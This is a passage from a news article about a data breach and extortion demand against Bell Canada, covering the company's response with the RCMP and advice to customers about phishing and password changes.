There is still no explanation of who is behind the extortion demand or what sort of cooperation the hackers were seeking, but it appears Bell Canada refused to pay the ransom demand.
However, this information remains unconfirmed.
What is Bell Canada doing? Canada's largest telecommunications company said it is working with Canadian law enforcement authorities to figure out who was responsible for the attack.
"We apologize to Bell customers for this situation and are contacting those affected directly," the company said.
"Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner."
What should Bell Canada customers do?
While Bell Canada believes there is "minimal risk involved for those affected" by the attack, having access to customer information, including email addresses, names and/or telephone numbers, opens the opportunity for targeted phishing attacks to customers.
So, users should be particularly alert to phishing emails, which are usually the next step cyber criminals take after a breach to trick users into giving up further details such as financial information.
For obvious reasons, all Bell Canada customers are strongly advised to change their passwords as soon as possible.